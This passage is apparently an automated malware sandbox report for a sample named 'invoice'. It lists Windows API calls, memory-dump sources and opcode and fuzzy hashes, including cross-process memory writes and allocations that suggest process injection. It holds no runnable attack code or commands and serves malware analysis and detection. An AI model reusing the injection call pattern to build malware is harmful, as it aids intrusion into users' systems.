                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$__itow$_memmove
                        • String ID:
                        • API String ID: 2983881199-0
                        • Opcode ID: d0c192c16c1266ba120fe710f964c5a35355f6bad4c43167ab8b8ad8dbf3ece8
                        • Instruction ID: 916d550dbd30211a6403a421a232e23488b3d00854d9bec30a5c11c0cd5a357a
                        • Opcode Fuzzy Hash: d0c192c16c1266ba120fe710f964c5a35355f6bad4c43167ab8b8ad8dbf3ece8
                        • Instruction Fuzzy Hash: 51210A31B042147BDB21ABA08C85EEE7BA9EF49720F080026F904DB340D6B4DD41B791
                        APIs
                        • IsWindow.USER32(00000000), ref: 00FF5B84
                        • GetForegroundWindow.USER32 ref: 00FF5B9B
                        • GetDC.USER32(00000000), ref: 00FF5BD7
                        • GetPixel.GDI32(00000000,?,00000003), ref: 00FF5BE3
                        • ReleaseDC.USER32(00000000,00000003), ref: 00FF5C1E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$ForegroundPixelRelease
                        • String ID:
                        • API String ID: 4156661090-0
                        • Opcode ID: a4c74dd23ead81480cf1f759be6344cc4472db3c9ee0ca31dfafa39388e7b96e
                        • Instruction ID: d36716bc34a6a18633b5ab60e48e5367d160641f1d242cca9478d744e3669edd
                        • Opcode Fuzzy Hash: a4c74dd23ead81480cf1f759be6344cc4472db3c9ee0ca31dfafa39388e7b96e
                        • Instruction Fuzzy Hash: 3C21C335A00508AFD724EF65CC88AAAB7F5FF49310F048469F94AD7362CB79AD01EB50
                        APIs
                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F8134D
                        • SelectObject.GDI32(?,00000000), ref: 00F8135C
                        • BeginPath.GDI32(?), ref: 00F81373
                        • SelectObject.GDI32(?,00000000), ref: 00F8139C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ObjectSelect$BeginCreatePath
                        • String ID:
                        • API String ID: 3225163088-0
                        • Opcode ID: fb7595c9337a39f2378b6e9d243ec6d480acc0e62006ab36e241adcd1534ce50
                        • Instruction ID: b70b0242a9981a200282ed27ddd0289b09c28ee53ce054bee82e2cdda986b4f7
                        • Opcode Fuzzy Hash: fb7595c9337a39f2378b6e9d243ec6d480acc0e62006ab36e241adcd1534ce50
                        • Instruction Fuzzy Hash: C021A474C00208DFEB319F15DD847A93BE8FB04321F244319F494A6194DB7A9892EF90
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 00FE4B61
                        • __beginthreadex.LIBCMT ref: 00FE4B7F
                        • MessageBoxW.USER32(?,?,?,?), ref: 00FE4B94
                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00FE4BAA
                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00FE4BB1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                        • String ID:
                        • API String ID: 3824534824-0
                        • Opcode ID: f2369b8cb6df5143c981ffab13ad7692500dbc556417310f8c2e6d4bb7fade4c
                        • Instruction ID: 8824b48b70d2ac8d4c0919bd5ee78345ce42297e202dadfcc82c14618487596f
                        • Opcode Fuzzy Hash: f2369b8cb6df5143c981ffab13ad7692500dbc556417310f8c2e6d4bb7fade4c
                        • Instruction Fuzzy Hash: B0116BB6904245BBC7218FA8DD44ADF7FACEB8A330F14425AF854D3244C67ADC0097A1
                        APIs
                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FD8546
                        • GetLastError.KERNEL32(?,00FD800A,?,?,?), ref: 00FD8550
                        • GetProcessHeap.KERNEL32(00000008,?,?,00FD800A,?,?,?), ref: 00FD855F
                        • HeapAlloc.KERNEL32(00000000,?,00FD800A,?,?,?), ref: 00FD8566
                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FD857D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 842720411-0
                        • Opcode ID: 6394a46cd6066510711e72b31c62c52e16e3c82de80d4b703daea778ad8c4d81
                        • Instruction ID: 11c4cefc0847f345715796919785100315b77f45752bed19da87e9e521587560
                        • Opcode Fuzzy Hash: 6394a46cd6066510711e72b31c62c52e16e3c82de80d4b703daea778ad8c4d81
                        • Instruction Fuzzy Hash: 7C014F71600205AFDB315FA6EC48D6B7B7DEF4A3A5B18052AF849C2210DA329D01EB70
                        APIs
                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FE5307
                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00FE5315
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FE531D
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00FE5327
                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FE5363
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: PerformanceQuery$CounterSleep$Frequency
                        • String ID:
                        • API String ID: 2833360925-0
                        • Opcode ID: d358f7e95304fa7fc1b1ec6ec52890090c2add730077da82f55fd7c316770f44
                        • Instruction ID: 91a6fe779e24bf966e6a1007b2487a08b8bafbe2a3284dc411c8cdd7acc1e320
                        • Opcode Fuzzy Hash: d358f7e95304fa7fc1b1ec6ec52890090c2add730077da82f55fd7c316770f44
                        • Instruction Fuzzy Hash: 9901C431C05A1DDBDF20EFE5E8485EDBB79FB09710F040049E841F2144CBB59510A7A1
                        APIs
                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD736C,80070057,?,?,?,00FD777D), ref: 00FD744F
                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD736C,80070057,?,?), ref: 00FD746A
                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD736C,80070057,?,?), ref: 00FD7478
                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD736C,80070057,?), ref: 00FD7488
                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD736C,80070057,?,?), ref: 00FD7494
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: From$Prog$FreeStringTasklstrcmpi
                        • String ID:
                        • API String ID: 3897988419-0
                        • Opcode ID: c30238d050091024e5ab900b8c361f9950a23f23ec05146eccc2c6ed47e202ac
                        • Instruction ID: b6f33ab1ed62551982d279294304b107c361b072ed9b8ac762d6238283a205e1
                        • Opcode Fuzzy Hash: c30238d050091024e5ab900b8c361f9950a23f23ec05146eccc2c6ed47e202ac
                        • Instruction Fuzzy Hash: 7901D872600315FBD7229F24DC04BAA7FBDEB45761F144019FD04D6214E736DE00A790
                        APIs
                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FD83E8
                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FD83F2
                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FD8401
                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FD8408
                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FD841E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: HeapInformationToken$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 44706859-0
                        • Opcode ID: 3dbbfbc3dbb43d16f0362b013a828170782e42a87750978d84b7a430a00bb5ef
                        • Instruction ID: 483f51a7af7ac05e3a53eaaf371999c8da89f142f4462de1583e579ec51c7216
                        • Opcode Fuzzy Hash: 3dbbfbc3dbb43d16f0362b013a828170782e42a87750978d84b7a430a00bb5ef
                        • Instruction Fuzzy Hash: 3DF04431604306AFD7319F65DC89FAB3BADEF8A7A4F044416F945C6240CE669C41EB60
                        APIs
                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FD8449
                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FD8453
                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD8462
                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD8469
                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD847F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: HeapInformationToken$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 44706859-0
                        • Opcode ID: f05af9ff87271f13b1bdf89589c075423c6d09ec546c9d7f01ba6e697ec032e3
                        • Instruction ID: 23e9733309af54381c93569574c3d33eee5a44526c55ec9863743f909d7123d3
                        • Opcode Fuzzy Hash: f05af9ff87271f13b1bdf89589c075423c6d09ec546c9d7f01ba6e697ec032e3
                        • Instruction Fuzzy Hash: 60F04431200306BFD7325FA5DC88E673FBDEF4A7A4F084116F945C7240CA659941EB60
                        APIs
                        • GetDlgItem.USER32(?,000003E9), ref: 00FDC4B9
                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00FDC4D0
                        • MessageBeep.USER32(00000000), ref: 00FDC4E8
                        • KillTimer.USER32(?,0000040A), ref: 00FDC504
                        • EndDialog.USER32(?,00000001), ref: 00FDC51E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                        • String ID:
                        • API String ID: 3741023627-0
                        • Opcode ID: c9691215d2cb2155fa6ca5bb2b9c641a5cd951179c571b5410caf503be5de630
                        • Instruction ID: 835e4601276121f7071ccf05dbf9700c2549460ca9007039fbc36956f703ed52
                        • Opcode Fuzzy Hash: c9691215d2cb2155fa6ca5bb2b9c641a5cd951179c571b5410caf503be5de630
                        • Instruction Fuzzy Hash: 2D01A230800306ABEB31AB20EC4EBA677B9FF04705F08025AE582A11D0DBE5A944EB80
                        APIs
                        • EndPath.GDI32(?), ref: 00F813BF
                        • StrokeAndFillPath.GDI32(?,?,00FBBA08,00000000,?), ref: 00F813DB
                        • SelectObject.GDI32(?,00000000), ref: 00F813EE
                        • DeleteObject.GDI32 ref: 00F81401
                        • StrokePath.GDI32(?), ref: 00F8141C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Path$ObjectStroke$DeleteFillSelect
                        • String ID:
                        • API String ID: 2625713937-0
                        • Opcode ID: 5e868886e4b0af7a03dc367696c74af038c4a1aaecb18e154caaf75c267881bd
                        • Instruction ID: 8de39764fde118242c4c993da130d0d4a11cba899ef67f834e85390af35f8a18
                        • Opcode Fuzzy Hash: 5e868886e4b0af7a03dc367696c74af038c4a1aaecb18e154caaf75c267881bd
                        • Instruction Fuzzy Hash: D1F0CD740042099BEB329F56ED8C7983BA8B701326F188318F4A9594F8CB3A4596EF50
                        APIs
                        • CoInitialize.OLE32(00000000), ref: 00FEC4BE
                        • CoCreateInstance.OLE32(01012D6C,00000000,00000001,01012BDC,?), ref: 00FEC4D6
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                        • CoUninitialize.OLE32 ref: 00FEC743
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CreateInitializeInstanceUninitialize_memmove
                        • String ID: .lnk
                        • API String ID: 2683427295-24824748
                        • Opcode ID: 9bdada1c9d590730f0f5cc6606856d36b2852f862b0e1b7cccaaeb894b54b561
                        • Instruction ID: 06a7ce92f79251ef1a634b0f69de66d25f4c26a4cb46c845410d7c28c982a80f
                        • Opcode Fuzzy Hash: 9bdada1c9d590730f0f5cc6606856d36b2852f862b0e1b7cccaaeb894b54b561
                        • Instruction Fuzzy Hash: 5BA11971108205AFD304FF64CC91EABB7E8EF84704F14491CF1969B192DBB5EA09DB92
                        APIs
                          • Part of subcall function 00FA0F36: std::exception::exception.LIBCMT ref: 00FA0F6C
                          • Part of subcall function 00FA0F36: __CxxThrowException@8.LIBCMT ref: 00FA0F81
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                          • Part of subcall function 00F87BB1: _memmove.LIBCMT ref: 00F87C0B
                        • __swprintf.LIBCMT ref: 00F9302D
                        Strings
                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00F92EC6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                        • API String ID: 1943609520-557222456
                        • Opcode ID: 775b3f386b1b4f6f6a957158746266ac19c94588740c39d18dd2e49bdf748dbd
                        • Instruction ID: ab698c14cd759d1678017f7b6a909776749dbff2cbcdc3eb66d117d847d45281
                        • Opcode Fuzzy Hash: 775b3f386b1b4f6f6a957158746266ac19c94588740c39d18dd2e49bdf748dbd
                        • Instruction Fuzzy Hash: 32916A715083019FDB18FF24DD86DAEB7A4EF85710F04491DF4819B2A1EB24EE04EB52
                        APIs
                          • Part of subcall function 00F848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F848A1,?,?,00F837C0,?), ref: 00F848CE
                        • CoInitialize.OLE32(00000000), ref: 00FEBA47
                        • CoCreateInstance.OLE32(01012D6C,00000000,00000001,01012BDC,?), ref: 00FEBA60
                        • CoUninitialize.OLE32 ref: 00FEBA7D
                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                        • String ID: .lnk
                        • API String ID: 2126378814-24824748
                        • Opcode ID: 4b6a72135a1a04cc969d4b7b8c63624c040213dc7caa63d3af9d58a9a80de673
                        • Instruction ID: aa0b3fb9454974e09780b2543342579e6c0481564139874f7fbe9d0db7ddaa3d
                        • Opcode Fuzzy Hash: 4b6a72135a1a04cc969d4b7b8c63624c040213dc7caa63d3af9d58a9a80de673
                        • Instruction Fuzzy Hash: DAA187746043019FCB14EF15C884E6ABBE5FF88324F148988F89A9B3A1CB35ED45DB91
                        APIs
                        • __startOneArgErrorHandling.LIBCMT ref: 00FA521D
                          • Part of subcall function 00FB0270: __87except.LIBCMT ref: 00FB02AB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ErrorHandling__87except__start
                        • String ID: pow
                        • API String ID: 2905807303-2276729525
                        • Opcode ID: 73220158e01ffdd20ae6c6cfe1d457cccfeff9c252d42ba3582c748a3356db49
                        • Instruction ID: 3089069375fc52ee887cf23e3b4152d3e6d7c1aa1173bd0c691bfbf2bdc8638f
                        • Opcode Fuzzy Hash: 73220158e01ffdd20ae6c6cfe1d457cccfeff9c252d42ba3582c748a3356db49
                        • Instruction Fuzzy Hash: 285134B1E08605D7DB21A715C9453BF3BD4EB42B20F288958F4D686199EF398CC8BF46
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID: #$+
                        • API String ID: 0-2552117581
                        • Opcode ID: e173b186cc07ddae54832db60d7599f6c514095c99c498bc2c29d1316e796306
                        • Instruction ID: 432f43b70a48f483babf51f16e2b86b45ce3dfcb5b707db82319d0f922fc9a6f
                        • Opcode Fuzzy Hash: e173b186cc07ddae54832db60d7599f6c514095c99c498bc2c29d1316e796306
                        • Instruction Fuzzy Hash: A25101759043469FDF259F28D884BFA7BB5EF96720F184056E8919B390CB349C42EB60
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memset$_memmove
                        • String ID: ERCP
                        • API String ID: 2532777613-1384759551
                        • Opcode ID: f3805eac498890ee9d1b9a1c3e7d1cb9ab8e07b67afc699268f531a3d11785b5
                        • Instruction ID: 20a1cd0625dacc51b1b2dac20efc50b2526b39cae88565f3fdf340b5f1c14f0c
                        • Opcode Fuzzy Hash: f3805eac498890ee9d1b9a1c3e7d1cb9ab8e07b67afc699268f531a3d11785b5
                        • Instruction Fuzzy Hash: F851B171D00309DBDB24DF99C945BAAB7F8FF44314F20856EE54ACB240E775AA84EB80
                        APIs
                          • Part of subcall function 00FE17ED: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FD9558,?,?,00000034,00000800,?,00000034), ref: 00FE1817
                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00FD9B01
                          • Part of subcall function 00FE17B8: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FD9587,?,?,00000800,?,00001073,00000000,?,?), ref: 00FE17E2
                          • Part of subcall function 00FE170F: GetWindowThreadProcessId.USER32(?,?), ref: 00FE173A
                          • Part of subcall function 00FE170F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00FD951C,00000034,?,?,00001004,00000000,00000000), ref: 00FE174A
                          • Part of subcall function 00FE170F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00FD951C,00000034,?,?,00001004,00000000,00000000), ref: 00FE1760
                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FD9B6E
                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FD9BBB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
